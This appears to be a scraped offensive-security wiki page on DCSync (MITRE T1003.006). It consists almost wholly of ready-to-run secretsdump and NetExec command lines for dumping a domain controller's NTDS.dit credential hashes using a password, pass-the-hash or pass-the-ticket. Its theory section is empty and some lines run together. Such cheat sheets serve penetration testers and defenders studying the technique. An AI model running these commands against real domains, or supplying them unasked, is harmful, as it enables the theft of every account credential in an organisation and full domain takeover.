DCSync
MITRE ATT&CK™ Sub-technique T1003.006
Theory
Practice
Secretsdump.py
# using a plaintext password
secretsdump -outputfile 'something' 'DOMAIN'/'USER':'PASSWORD'@'DOMAINCONTROLLER'
# with Pass-the-Hash
secretsdump -outputfile 'something' -hashes 'LMhash':'NThash' 'DOMAIN'/'USER'@'DOMAINCONTROLLER'
# with Pass-the-Ticket
secretsdump -k -outputfile 'something' 'DOMAIN'/'USER'@'DOMAINCONTROLLER'File
Content
NetExec
### Shadow Copy
# Remote dumping of NTDS.dit using drsuapi
netexec smb $TARGETS -d $DOMAIN -u $USER -p $PASSWORD --ntds
# Remote dumping of NTDS.dit using drsuapi (pass-the-hash)
netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --ntds
# Remote dumping of NTDS.dit using drsuapi (pass-the-ticket)
netexec smb $TARGETS -k --use-kcache --ntdsNtlmrelayx.py
Resources
Last updated